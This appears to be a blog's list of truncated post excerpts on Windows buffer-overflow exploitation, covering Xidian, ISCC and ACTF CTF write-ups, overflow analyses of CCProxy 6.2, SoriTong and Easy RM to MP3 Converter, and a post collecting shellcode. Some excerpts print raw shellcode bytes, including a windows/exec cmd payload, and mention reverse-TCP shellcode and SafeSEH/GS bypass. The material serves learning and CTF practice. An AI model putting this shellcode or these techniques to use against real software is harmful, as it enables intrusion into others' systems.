漏洞
w4y2
2424891805
展开
-
2012西电攻防溢出第二题
这是2012西电攻防溢出第二题,是我见过最简单的溢出题了。题目要求:1、 请输入一段字符串;2、 目的是使程序显示如下对话框: 3、 不得修改程序本身;4、 提交答案,给出字符串内容。 运行程序如图:随便输入较长的字符串就出错了,可见触发点很好找,打开OD看代码,不仅找到了打印字符串和输入原创 2013-12-23 22:37:26 · 746 阅读 · 0 评论 -
ISCC2014--pwn
第一次做iscc,感觉这个比赛内容很丰富,获得不少乐趣,把自己做的pwn的题解贴出来,在小白的成长之路上mark一下,还有很长的路要走。 题目与题解链接:http://pan.baidu.com/s/1qWGzvbe 以下是斗克之乱、远征郑国、镇压叛乱、晋楚争霸的题解。 运行环境:win xp sp2 运行程序如下图,给出了题目要求,看来shellcode为tcp反原创 2014-06-15 00:19:48 · 3218 阅读 · 0 评论 -
ActiveX溢出漏洞实践分析
我对于ActiveX控件漏洞久仰已久,今天终于腾出时间学习一下,看了《0day》和《软件漏洞发掘》关于ActiveX这部分内容的讲解,以及网上一些博客的讲解,有了一定的了解。总结了ActiveX漏洞挖掘的步骤:1).判断是否属于远程类型的ActiveX控件 2).获得该控件的唯一标识。 3).找出该控件的向外提供的所有接口。 Act原创 2014-04-12 19:45:01 · 2320 阅读 · 0 评论 -
ACTF2014exploit100 餐前甜点
餐前甜点 首先用IDA加载看主函数char *__cdecl main(){ char *result; // eax@1 int v1; // [sp+1Ch] [bp-84h]@1 int (*v2)(void); // [sp+9Ch] [bp-4h]@1 v2 = 0; puts("== Welcome to PWWWWWWWWN wor原创 2014-04-06 00:04:45 · 1100 阅读 · 5 评论 -
CCProxy 6.2 溢出漏洞分析
操作系统:Microsoft windows XP SP3溢出软件:CCPROXY http://pan.baidu.com/s/1pJI0loZ CCProxy于2000年6月问世,是国内最流行的下载量最大的的国产代理服务器软件。主要用于局域网内共享宽带上网,ADSL共享上网、专线代理共享、ISDN代理共享、卫星代理共享、蓝牙代理共享和二级代理等共享代理上网原创 2014-04-03 12:01:43 · 4001 阅读 · 11 评论 -
SoriTong1.0漏洞分析
这个由韩国的New Software Xperts公司所发展的MP3播放程序介面真的是一级棒的没话说,所耗的CPU资源非常低,基本的功能有可显示及编辑ID3Tag (支持中文)、可编辑播放清单、可设定4种EQ值随时依喜好来快速切换、单首或全部循环拨放、面板频谱分析仪显示,另外妙的是它还可让你调整乐曲的节奏速度。程序本身还附有一个可常驻在Syatem Tray的Tray Girl,你可以使用鼠标右键原创 2014-04-06 00:01:31 · 1016 阅读 · 0 评论 -
2010西电攻防exploit第6题
这是2010年溢出第六题,其实挺简单的,就是在shellcode上走了弯路。 执行程序后出现也没法输入数据,那就打开OD看喽。一看是一个TCP服务端,IP地址是“127.0.0.1”,port端口是0x1e61,即7777,那就构造了一个tcp客户端,发送数据 #include #include #pragmacomment(lib,"wsock32原创 2013-12-24 10:26:32 · 912 阅读 · 0 评论 -
2012西电攻防溢出第三题题解
这是2012西电攻防溢出第三题,分析挺简单的,就是具体实施时比较麻烦。 以下是题目要求: 1、 Exploit.exe程序是一个简易的网络聊天工具;2、 该程序在接收字符串没有进行边界检查,存在缓冲区溢出漏洞;3、 请你找出bug,并尝试exploit,以打开cmd.exe为成功;4、 需要简要文字叙述;5.、提交格式可参考附件。 打开如图:原创 2013-12-27 21:39:48 · 908 阅读 · 0 评论 -
积累的一些常用shellcode
//windows/exec {CMD=cmd, Encoder=generic/none} 195 bytes.char shellcode7[]="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31""\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52""\x14\x8b\x72\x28\x0f\xb7原创 2014-02-18 10:07:28 · 3308 阅读 · 2 评论 -
Easy RM to MP3 Converter Version 2.7.3 700漏洞分析
软件链接:http://pan.baidu.com/s/1eQcLbpw测试环境:xp sp3看了exploit编写教程第一篇,知道了这个小软件有溢出漏洞,教程上用的是windbg分析的,由于咱习惯了界面友好的OD,对于教程上的分析步骤不是很感冒,既然知道了这是个有溢出漏洞的软件,那不如自己用OD亲自实践一把。 运行程序,界面如图,下方为它的版本号。原创 2014-04-03 10:30:01 · 1927 阅读 · 0 评论 -
2012西电攻防溢出第一题
#include char shellcode[]="\xEB\x67\x55\x8B\xEC\x64\xA1\x30""\x00\x00\x00\x8B\x40\x0C\x8B\x40\x14\x8B\x00\x8B\x70\x28\x80\x7E""\x0C\x33\x75\xF5\x8B\x40\x10\x8B\xF8\x03\x7F\x3C\x8B\x7F\x78\x0原创 2014-04-03 12:54:58 · 905 阅读 · 0 评论 -
西电攻防2010溢出第四题
西电攻防2010溢出第四题题目要求如下:exploit4.exe程序运行后,会读取当前目录下的1.txt的内容,并根据后续输入的block size来计算文件可以分割成多少块。exploit4.exe程序存在缓冲区溢出漏洞,但是编译时使用了safeseh和GS。请想办法绕过safeseh和GS保护机制,使其成功执行shellcode(shellcode功能为在9999端口建立一个服务器等待原创 2014-04-03 12:52:17 · 1066 阅读 · 0 评论 -
2010年西电攻防exploit 01题解
拿到这个题首先运行了一下,弹出了一个窗口,点确定就结束了,要想输入产生溢出,显然要从它生成的exploit.dat入手。 在exploit.dat中输入了很长的”1111…”,然后又运行了程序,没有任何问题发生,看来要用OD分析汇编代码了。跟着代码单步调试,看到了如下图如果没有exploit.dat,程序则创建了exploit.dat,判断文件大小,如果高于原创 2013-12-16 17:53:42 · 789 阅读 · 0 评论 -
2013西电攻防exploit第四题题解
这是2013年西电攻防exploit的第四题,网上已经有很多答案了,我也就拿来练练手在众多题中,我当然先选软柿子捏了,这一题貌似简单,其实就是很简单,只是像我这样的初学者没什么经验,做起来比较绕。首先执行程序,如下图 那就输入一个长字符串试试喽,于是一串“1111111111111111111”,结果如下图 让我颇为原创 2013-12-19 09:01:35 · 821 阅读 · 0 评论 -
ACTF2014exploit200 杀猪吃肉
这是个64位ELF程序,用OD加载,分析关键代码 .text:0000000000400A1A public main.text:0000000000400A1A main:.text:0000000000400A1A push rbp.text:0000000000400A1B原创 2014-04-07 00:48:55 · 1768 阅读 · 0 评论